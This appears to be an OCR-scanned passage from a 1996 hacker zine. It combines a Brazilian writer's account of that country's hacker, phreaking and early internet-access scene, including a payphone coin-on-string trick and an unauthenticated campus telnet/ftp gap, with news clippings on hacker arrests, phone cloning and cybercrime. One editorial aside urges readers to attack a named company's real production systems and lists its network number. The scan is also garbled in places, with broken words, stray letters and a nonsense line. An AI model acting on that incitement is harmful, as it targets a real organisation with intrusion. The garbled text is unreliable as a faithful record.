most schools are advertising computer training as part of their 
curricula, to charge more, and like everywhere, I guess, people no 
longer learn typewriting, but computer-writing, and many brazilian 
newspapers dedicate a section on computer knowledge once a week, with 
advertising, hints, general info and even lists of BBS’s. 


A few years ago, the "Video-texto" terminals were also big meeting 
places. That was part of a effort to make popular the use of a 

computer linked by modem to get services like msx-games, info on 
weather, check bank account and so on. Just like the Net, one could do 
e-mail, by some fancy tricks and other things that could be called 
hacking. The difference was that it was made by the state-owned 
telephone company and each time the trick was too well know, it was 
changed. The only way to keep in touch was keeping in touch with the 
people who used the system like hell. It’s no different than what it 
happens with the computer gurus. The protocol used for that, X-25 is the 
same used for the banking money transfers, but don’t think it was 
possible to do anything more than checking how much money one had anda 
few other classified data. People who used that at home (not too many, 
since the company didn’t think it would be such a hit, and didn’t 
provide for it) could spend their fathers money discovering funny things 
about the system, like messing with other people’s phones and so. One 
could also use the terminals at the Shopping Centers to make phone 
calls to their friends without paying. The guy at the other end would be 
heard by the small speaker. 


Phreaking here in Brazil is something secret. Apart from the trick 
described in the section "Letters to read by" at the summer 1994 of the 
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2600 Magazine, where one would call through locked rotatory telephone, 
little is known about phreaking. One thing is that people who enrolled 
in Telecommunications Engineering could call Europe and USA with ease, 
but they would not tell you how. It must be said that all public phones 
have metal cables around the cables and that the phone machines are 
quite tough to break down. I guess it wasn’t for beauty. 


The phones use some sort of metal coins called fichas, which must be 
bought somewhere. The trick is to use a coin with a string, so it would 
not be collected. But if the police caught... The police doesn’t follow 
rules about that. Either they put a fine on the guy for that, or arrest 
him for vandalism or anything else they think of at the moment. It is 
hassle, anyway. My friend who was doing electrical Engineering told me 
that boxing in Brazil was impossible. The system is just not good enough 
to be boxed. Another friend of mine told me that in the Northeast part, 
where people are a little bit different and more easy-going, the phone 
s 
t 
a 


ystem can be boxed, because some top-brass asked the company to let 
hat feature implemented. The Phone company doesn’t admit any knowledge 
bout that. 


Internet access is something quite hard to get today. Until a few weeks 
ago, the system would not let the creation of a Internet site that was 
not part of some research project. So, only Universities and like were 
capable of putting people in the Net Universe. In the University of Sco 
Paulo, people in the post-graduation courses could get it with ease, but 
graduating students would have to show some connection to a research 
project. That in theory, because the students found out that one could 
use the IBM CDC 4360 to telnet without a Internet account. Also, all the 
faculties that had computer rooms full of AT 386 which where linked by 
fiber optics to this computer. Another one did the file transfers 
between the accounts and the computer at the computer rooms and that 
ftp was also possible without an account, but only to a few sites, like 
oakland and so. That lasted for about a year, until that thing was 

fixed in the router, but only at the Politechnik School. Says the legend 
that the guys were downloading too much GIF and JPG pictures of Top 
Models from a ftp site nearby. That spent so much bandwidth that the 
site started to complain and both things happened: the site stopped to 
store GIF’s of wonderful women in swimsuit and the router was fixed to 
prevent ftp without a Internet account. One can still today connect the 
outside world via telnet and many people have accounts in Internet BBS 
like Isca BBS, Cleveland Freenet and like. The Bad Boy BBS was "in", 
until it went out of business. This kind of access is not good, though, 
for it is very slow, sometimes. Also, it is hard to download something 
bigger than 60 kbyte. The way I devised, downloading the file inside 
the bbs and uuencoding it. This way you could list the file and capture 
the screen listing, uudecode it after some editing and have a working 
-exe or .zip file. 


By these means one could, inside the Campus, do all downloading one 
wanted, from anywhere in the world. Outside the campus, it is possible 
to do it by phone lines, but: the Modem will not go faster than 2400 
without character correction (no Zmodem at all). Which makes quite hard 
to download compressed files. One could an account: that would be 
possible by these means, but the amount of trash during the phone 
connection would make it real hard to type in passwords and like. To try 
doing any kind of thin g but reading letters by modem is some kind of 
torture. The real thing is to do it by "linha dedicada", a special line 
for computer transmission. It’s much more expensive though, but if you 
have the money to spend with that... 


Perhaps the best way to get access to an Internet account though is to 
be part of the research project "Escola do Futuro" that among other 
things get schools linked by the Net. That’s what I did and they pay me 
quite well to search for data in the Net, for the students of those 
schools. The University of Campinas is said to give all students a 
Internet account regardless of knowledge of what-it-is, as soon as the 
guy(girl) gets in. Of course here there’s BITNET also. That’s doomed for 
extinction, but this or that reason keeps people from closing it down. 
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Most teachers use it, guess there’s even some post-graduation work 
written about that. It’s easier to access via modem, also. Old habits 
die hard. 


Outside the Campus, for common people, there are few opportunities. The 
only thing you can get, at least until the opening of commercial 
internet sites, something about to happen one of these days, is access 
by mail. You join one BBS with Internet access, and your mail is sent by 
a Internet account later during the day. This is not a direct access, 
as one can see, but it’s a easy way to access by modem. Problem is that 
you have to pay if you use it too much. The BBS’s that do it don’t do it 
for free, also. Connection to the Compuserve is also possible, but it 
also costs a lot of money, for my point of view. 


Because of the newspapers, the knowledge about Internet is spreading 
fast and the number of sites is growing the same way everywher lse in 
the world. Even the military people are starting with it. There are plan 
s to enhance it and make better connections, and some informative 
material is being translated in Portuguese, like "Zen and the Art of 
Internet" and made available in the gopher.rnp.br. There are many 
mirrors from many famous sites, like Simtel20 and at least one Internet 
BBS, the "Jacare BBS" (Alligator bbs, available by telnetting 
bbs.secom.ufpa.br - 192.147.210.1 - login bbs. World Wide Web sites ar 
becoming sort of popular also, but still available only to a few people 
who are lucky enough to get the access. Brazilian hackers are not very 
fond of sharing the knowledge of how to get access and other things, 
sometimes because of fear of losing it, sometimes because the greed of 
it would overcharge the system. There’s no hacker magazine here, yet, 
and very few people confess their curiosity about hacking for knowledge 
for fear of not finding jobs. Anyway most would-be hackers either get a 
job and stop hacking for fun or keep their activities secret in order to 
pursue their objectives. 


Today, Brazilian Hacker Underground did change a little. Lots of 
magazines, dealing only with Internet Issues, are being published. There 
is a hacker zine, the now famous "Barata Eletrica". This and the hacker 
list I created is starting to unite the computer rats, here. But I had 
to stop hacking in order to write the e-zine. Too famous to do that. 
Another guy just started the thing. He did not learn with my mistake and 
is signing it with his name, also. Received lots of letters, even as far 
as Mozambique, praising the material, which is very soft, for fear of 
losing my net access. Twice my account was "freezed". The people at my 
site are paranoid. Suffered too much from break-ins already. Most BBS’s 
are trying to turn themselves in Internet providers or else, to get 
e-mail access. There was a fear the State would control the thing, like 
they did with the Phone system. Can any of you guys imagine what it is, 
to pay 4.000 USS dollars for a phone line? In the City of Sao Paulo, 
(look like L.A., one can say), that’s the average price. Cellular is 
cheaper. Motorola rules. The public phone system was changed again. No 
more "fichas". At least for long distance calls. It’s a small card that 
looks like plastic one side and magnetic material in the other. m still 
trying to do 2600 meetings. Oh, once in a while, there is a break-in 
here and there, and a hacker is interviewed in TV, but people are only 
now making the difference between the good guys (hackers) and the bad 
guys (crackers). With Win95, people are losing fear of exchanging 
virus-sources files. The lack of philes in Portuguese makes it dificult 
for people to learn about hacking. People who know about it, don’t have 
enough time to write. I started to unite some guys to do a translation 
of "hacker crackdown", but that’s another story. I shortened the name of 
the book to "crack.gz". Guess what’s happened? My account is blocked up 
to this day. They told me I’1l1 get my access back. One of these days. 
O 
i 


ne of these days I’11 re-write this article, and tell the whole thing 
n detail. 


Any Portuguese speaker that does not know about my e-zine, 
try a ftp.eff.org mirror. The URL: 
ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica 
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Security Software Thwarts Hackers July 23, 1996 


(PRNewswire) 


World Star Holdings, Ltd. announced today that there have been approximately 
5,000 unsuccessful attempts to break its proprietary VPAGE Internet security 
system. In order to further demonstrate the functionality of its technology, 
they Company has unveiled a new addition to the World Star Internet security 


challenge: "The World Star Cyberhospital." 


The company recently launched an online contest offering more than $50,000 in 
cash and prizes to the first person to break its security. 


[ THESE CHALLENGES ARE UNADULTERATED BULLSHIT. Phrack suggests you test 
something other than the fake, non-production demo contest system. How 
well does their software hold up in a real business environment? 

(in other words: THEIRS!?!!@S) 


World Star Holdings (NET-WORLDSTAR-MB-CA) 
165 Garry Street 

Winnipeg, Manitoba R3C 1G7 

CA 


Netname: WORLDSTAR-MB-CA 
Netnumber: 205.200.247.0 ] 


Your Cellular Phone Number May Be Up For Grabs August 21, 1996 


by Mimi Whitefield (Miami Herald) 


oD 
G 


ilectronic bandits have snatched cellular phone numbers from the airwaves and 
cloned phones used by the Miami office of the Secret Servic 


BellSouth Florida president Joe Lacher’s phone has been cloned; Spero Canton, 
spokesman for BellSouth, has been a victim three times over. 


"The bums never sleep. They’r verywhere," complained Bill Oberlink, 
regional president for AT&T Wireless Services. 


But the good news is that law enforcement agencies and cellular companies 
themselves are fighting back with a new arsenal of tools, technology and laws 
that make it easier to detect and prosecute cellular bandits. 


Miami Fraud Squad Pursues Cellular Bandits August 12, 1996 


by Audra D.S. Burch (Miami Herald) 


How’s this for capitalism gone awry: Metro-Dade police nabbed a cellular 
bandit who was selling a $150 package deal $75 each for a stolen phone 
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and number -- along with a 30-day guarantee on unlimited illegal air time. 


In a sting operation, police took him on the cut-rate offer. 


Thanks to the work of a special Metro-Dade Police Economic Crimes Bureau, the 
entrepreneurial cloner got a prison sentence. 


Newer Technology Aids Fight Against Cellular Fraud August 21, 1996 


by Mimi Whitefield (Miami Herald) 


New technology is on the side of cellular companies fighting telecom criminals 
who can rack up thousands of dollars in illegal charges before a consumer even 
knows he’s been hit. 


New Jersey-based Bellcore, for example, has developed NetMavin software, 
which can detect fraudulent or unusual calling patterns within half an hour. 


"This is really going to screw the cloners up," said Roseanna DeMaria, an 
AT&T Wireless executiv 


SPA Files Copyright Suit July 28, 1996 


ma 


Reuters News) 


The Software Publishers Association said Sunday it filed a civil copyright 
infringement lawsuit against a Seattle man for illegal distribution of 
software on the Internet. 


The suit, which was filed July 23 in the U.S. District Court in Seattle, 
alleges that Max Butler illegally uploaded copyrighted software to a file 
transfer protocol site for distribution across the Internet, the trad 
association said. 


"This action is a warning to Internet users who believe they can infringe 
software copyrights without fear of exposure or penalty," said Sandra 
Sellers, Software Publisher’s vice president of intellectual property 
education and enforcement. 


The LOpht August, 1996 


by Steve G. Steinberg (Wired) p. 40 


What do a group of hackers do when th quipment they’ve accumulated over 
years of dumpster diving no longer fits in their apartments? They get 

a lOpht. Since 1993, a core group of seven Boston-based hackers have rented 
a loft space for hacking, trading information about cellular phones security, 
and building things like a wireless Internet service using discarded 
microwave equipment. 


Now that all of them have day jobs in the industry, why do they keep at it? 
"For the girls and the text files, of course," says Mudge. 


L) SHEET YE Sisto! Ll et eb Vol ak Teoh tt Vat Atel et al Va) 


Cracking Down on the Outlaws of Cyberspace July 2, 1996 


by M.J. Zuckerman (USA Today) p. 4B 
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What’s it take to be America’s top cybercop? 


"I was a hockey referee, so I’m used to being beaten up," suggests Jim 
Christy, who is among those most often mentioned for the title. And he’s 
been at it for only a decade. 


Today, with the weighty title of Chief of Computer Crime Investigations 
and Information Warfare, he is one of 68 computer investigators in the 
Air Force Office of Special Investigations (OSI). 


Christy, a Baltimore native, stumbled into the computer field. After 
drawing No. 35 in the draft lottery during the Vietnam War, he joined the 
Air Force rather than waiting to be drafted. He spent the next four years 
as a computer key punch operator, followed by 13 years as a civilian working 
computers at the Pentagon. 


When he moved to OSI, Christy largely ceased his hands-on involvement with 
computers and systems. 


Since last fall, Christy has been on temporary assignment to the Senate 
Permanent Subcommittee on Investigations, helping them examine security 
in cyberspace. 


"I like working up on Capitol Hill, because you can make a difference," 
Christy says. 


Hackers Penetrate Justice Department Home Page August 18, 1996 


(AP News Wire) 


Internet hackers infiltrated the Justice Department’s home page 
yesterday, altering the official web site to include swasticas, 
obscene pictures and lots of criticism of the Communications Decency Act. 


The official web site, which was turned off by government technicians 
when it was discovered, was changed to read "United States Department of 
Injustice," next to a red, black and white flag bearing a swastika. 


The page included color pictures of George Washington, Adolf Hitler, anda 
topless Jennifer Aniston. 


[ A link to a copy of the page is it http://www.fc.net/phrack/doj ] 


Employment Prospect Grim for Hacker August 19, 1996 


(AP News wire) 


Employment prospects are grim for Kevin Lee Poulsen, a computer whiz 
imprisoned five years for his cyberspace havoc. 


The 30-year-old hacker has been barred from getting near a computer for the 
next three years and he now fears selling cowboy boots at a Western store 
will be his only opportunity to make some money. 


"It’s the only place where I’ve been greeted with a positive attitude," he 
said during an interview last week. "I can’t get a job that I am qualified 
for, basically." 


On September 3, he goes to federal court in hopes of having some of the 
computer restrictions relaxed. 
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School Hires Student To Hack Into Computers August 22, 


(The Sun Herald) 


Students at Palisades Park’s high school needed their transcripts to 
send off to colleges. But they were in the computer and no one who knew 
the password could be reached. So the school hired a 16-year-old hacker 
to break in. 


Superintendent George Fasciano was forced to explain to the School 
Board on Monday the $875 bill for the services of Matthew Fielder. 


1996 


Feds aim low on hacker crackdown June 21, 


by Lewis Z. Koch (Upside Online News) 

Nineteen-year-old Christopher Schanot of St. Louis, Mo. has been 
languishing in a Federal jail since March 25, 1996, charged with four 
counts of computer hacking. He is not allowed to post bond, because 
Federal authorities contend he is "a computer genius intent on 
infiltrating computer systems of some of the largest companies and 
entities in the country," and because a jailhouse snitch claims Schanot 
bragged he would run away if he were released. He has never been charged 
with a crime or arrested before. 


Schanot’s problems began after he ran away from home on May 30, 1995, 


taking some of his disks, a hard drive and personal items. According to a 
knowledgeable source close to Schanot, Chris felt his parents, especially 


his father Michael, didn’t understand or respect him. 


Less rocky, it seems, was his relationship with Netta Gilboa, a 


38-year-old woman living near Philadelphia. Gilboa is editor-in-chief and 


publisher of _Gray Areas_, a slick, text-heavy, irregular magazine that 
xplores the "grey areas" of "alternative lifestyles and deviant 
subcultures." 


1996 


City of London Surrenders To Cyber Gangs June 2, 


(Times of London) 


1996 


City of London financial institutions have paid huge sums to international 
gangs of sophisticated "cyber terrorists" who have amassed up to 400 million 


pounds worldwide by threatening to wipe out computer systems. 


A Sunday Times Insight investigation has established that British and 
American agencies are examining more than 40 "attacks" on financial 
institutions in London and New York since 1993. 


Victims have paid up to 13 million pounds a time after the blackmailers 
demonstrated their ability to bring trading to a halt using advanced 
"information warfare" techniques learnt from the military. 


According to the American National Security Agency (NSA), they have 
penetrated computer systems using "logic bombs" (coded devices that can 
be remotely detonated), electromagnetic pulses and "high emission radio 
frequency guns," which blow a devastating electronic "wind" through a 
computer system. 


The gangs are believed to have gained expertise in information warfare 
techniques from the American military, which is developing "weapons" 
that can disable or destroy computer hardware. Some are also known to 
have infiltrated banks simply by placing saboteurs on their payroll as 
temporary staff. 
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Credit Fraud on AOL 


(AP Newswire) 


Two boys posed as billing representatives for an online service and stole 
at least 15 credit card numbers, and used those numbers to buy $15,000 
worth of merchandise, from computer equipment to cymbals, police said. 


The two 16-year-olds were charged with 39 counts of possession of 
stolen property, theft and attempted fraud. They were released to the 
custody of their parents pending a Family Court hearing. 


Police believe the boys obtained a program designed by computer 

hackers to flimflam customers of America Online. It sends a message to 
users saying they will be cut off if they don’t type in their name, 
credit card account number and computer service password. 


FBI Survey Reveals Growth of Cybercrime May 6, 1996 


by Rory J. O’Connor (San Jose Mercury News) 


Intruders are breaking into the nation’s computer systems at an 
increasing rate and often with more nefarious motives than in the 
past, according to a survey co-sponsored by the FBI and a private 
group of computer security professionals. 


"What this shows is that the ante has been upped in cyberspace," said 
Richard Power, senior analyst of the Computer Security Institute in 
San Francisco, which conducted the survey. "As all manner of commerce 
moves into cyberspace, all manner of crime is moving there as well. 
It’s no longer just vandalism." 


More than 40 percent of the 428 corporate, university and government 
sites that responded to the FBI survey reported at least one 
unauthorized use of their computers within the last 12 months, with 
some institutions reporting as many as 1,000 attacks in the period. 


It also appears that there’s more computer crime for hire occurring, 
Power said, exploiting mainly older hackers who have graduated to 
making money off the skill they once used simply to establish bragging 
rights with their peers. He suggested that some of the hiring is being 
done by intelligence services of various governments, although he 
offered no proof. 


University hacker to be hunted on the Internet April 27, 1996 


By Robert Uhlig (London Daily Telegraph) 


Computer experts at Cambridge University are using the Internet to hunt 
for a hacker who breached their security systems to access some of the 
world’s most sensitive research information. 


The authorities had no indication that the hacker deleted or altered 
files, “although there was the potential for that", he said. Files 
belonging to world-renowned research scientists may have been viewed or 
copied, giving the hacker an insight into commercially and academically 
sensitive material. 


The hacker used a so-called sniffer program, which sat silently within the 
computer system for four weeks, monitoring its activities. This could 
allow the hacker to compile a list of all passwords to give him unhindered 
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access to every computer on the university’s network. "There was the 
potential to access any material on any computer anywhere on the 
university’s network - ranging from electronic-mail to confidential 
research data," said Mr Stibbs. 


Agents’ Codes Exposed on Web March 16, 1996 


By: Robert E. Kessler (Newsday) 


In an attempt to help (Ed) Cummings, and discredit the Secret Service, a Long 
Island-based hacker magazine last week launched a page on the World Wide 

Web publishing lists of Secret Service radio frequencies, photographs of 
agents, and codenames used by the agency for officials and buildings. 


Last year, Cummings, a 35-year-old native of Reading, Pa., pleaded 
guilty to federal charges in Philadelphia of possessing telecommunications 
equipment with intent to defraud and served a seven-month prison sentence. 


As a result of that conviction, last week Cummings was sentenced by a 

judge in Easton, Pa., north of Philadelphia, to serve a six- to 24-month 
sentence for violating probation after pleading no contest to a 1994 charge 
of tampering with evidence in another telephone hacking case. 


"Painting this guy as some white knight or someone who is standing up 
for free speech is wrong," said Kun. "He’s engaged in fraud." 


Cummings’ attorney, Kenneth Trujillo, could not be reached for comment. 


Judge Denies Bond to Accused Hacker April 6, 1996 


by Tim Bryant (St. Louis Post Dispatch) 


After another prisoner said accused computer hacker Christopher Schanot was 
planning a quick escape from his parents’ home near High Ridge, a federal 
magistrate decided Friday to keep Schanot in jail. 


"He said he would wait a couple of days and take off," testified the 
prisoner, Gerald Esposito. 


Schanot’s lawyer, federal public defender Norm London, told Davis that 
the alleged conversation between the young man and Esposito never happened. 


London, pointing out that Esposito has convictions for sexual assault, 
said the older prisoner had "made overtures" to jail officials about moving 
Schanot into Esposito’s housing area. 


Hacked Off! Government, Firms Fight Computer Intruders April 7, 1996 


by Colleen Bradford (St. Louis Post Dispatch) 


Every day, hundreds of people in front of personal computers try to sneak 
into corporate and government computer networks. Sometimes they just look 
around, sometimes they destroy data and sometimes they steal personal and 
classified information. 


Two weeks ago, law enforcement officials charged an Argentine, 21, with 
using the Internet to illegally break into computer networks at Department 
of Defense installations, the NASA, Los Alamos National Laboratory and 
several universities. The Justice Department is now seeking Julio Cesar 
Ardita, who accessed confidential research files on aircraft design, radar 
technology and satellit ngineering. 
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And Chris Schanot, 19, from High Ridge, was in court in St. Louis last 

week on charges of hacking. Schanot, who fled to Pennsylvania from St. 
Louis after graduating from Vianney High School last May, is accused ina 
five-count indictment of breaking into the computers of Southwestern Bell, 
Bell Communications Research, Sprint and SRI International, a research and 
development contractor with government contracts. His trial is set for June 
10. 


Schanot, like other hackers, likely became addicted to the feeling of 
power that cracking into a private computer network brings, said St. Louis 
County Police Sgt. Thomas Lasater, who has been investigating computer 
crime for seven years. 


"Normally these young hackers do not use the computers for financial 
gain," Lasater said. "It’s just a challenge for them to see what they can 
conquer." 


Mike and Terry’s Dreadful Adventure 


by Elizabeth Weise (AP Newswire) 


Terry Ewing was late. His plane left in an hour and he was cutting it close. 
But he couldn’t tear himself away from his computer and the hole he’d hacked 
into the security network of Tower Records. 


He kept poking around, looking for something interesting to take to the 
hackers’ convention he was going to. Finally, five minutes before th 
airport shuttle beeped in front of his apartment, he downloaded a file 
containing 1,700 credit card numbers. 


"We didn’t expect anyone was watching," he said seven months later - 
through an inch of Plexiglas at the Sacramento County Jail. 


Ewing had had second thoughts about taking the Tower Records file with 
him on July 31, so he left it on his hard drive while he and Kim hit 
DefCon, the biggest of the West Coast hacker gatherings, for a weekend of 
bragging, hanging out and messing around. 


"We never guessed they were onto us. Their security was so weak it 
really blew," the 20-year-old Kim says by phone from the sixth floor of 
the same jail that held his friend. He is facing an 18-month sentence. 


